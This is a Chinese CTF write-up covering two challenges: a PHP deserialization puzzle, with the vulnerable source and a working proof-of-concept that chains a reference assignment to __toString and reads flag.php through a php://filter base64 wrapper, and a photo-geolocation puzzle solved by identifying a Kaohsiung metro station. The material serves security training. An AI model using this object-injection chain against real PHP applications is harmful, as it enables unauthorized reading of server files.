猫和老鼠

反序列化题目：

<?php
//flag is in flag.php
highlight_file(__FILE__);
error_reporting(0);

class mouse
{
public $v;

   public function __toString()
    {
        echo "Good. You caught the mouse:";
        include($this->v);
      
    }

}


class cat
{
    public $a;
    public $b;
    public $c;


    public function __destruct(){
        $this->dog();
        $this->b = $this->c;
        die($this->a);
    }
    public function dog()
    { 
        $this->a = "I'm a vicious dog, Kitty";    
    }
}

unserialize($_GET["cat"]); 

?>

分析代码得知，flag在flag.php 读取flag的点在 mouse类的include函数。因而就要触发toString函数

而cat类中的 dog函数会对变量 $this->a 赋值字符串，我们可以利用这个$this->b = $this->c来给 $this->a 赋值 new mouse类，具体方法就是让$this->b = &$this->a,引用传递，之后die($this->a);触发tostring函数，poc如下：

<?php

class mouse
{
    public $v="php://filter/read=convert.base64-encode/resource=flag.php";
}


class cat
{
    public $a;
    public $b;
    public $c;
}
$aa = new cat();
$aa -> c = new mouse();
$aa -> b = &$aa->a;
echo urlencode(serialize($aa));

?>

 base64解码得到flag

简单社工

开具一张图，flag格式为：ISCTF{MD5(XX省XX市XX区XX站)}

注：别用百度，google好一点

 不难看出这是一个地铁站，然后在动漫牌子上看见了高雄捷运，搜索后得知这是台湾的地铁站。

emmm确实不一样，动漫站牌    然后还可以看见一个时刻表以及 显目的 小港(南)

我们利用此信息搜索高的捷运的地铁线路表：

根据 小港(南) 上北下南，肯定是红线，然后我们 去高雄捷运官网，根据唯一已知的末班车时刻表信息区查一下对应的站点

看见 R14巨蛋站的时间和图片吻合   末班车往岡山00:29   末班车往小港00:22

 我们搜索一下巨蛋站的信息，再确认一下

从这里查看图片，看看有没有类似我们给出的图的痕迹：

 搜着搜着好多不是，但是最后猛地看见一个特别熟悉的背景，这不就是图里背面的画吗？

 最终得到：台湾省高雄市左营区巨蛋站

md5一下，correct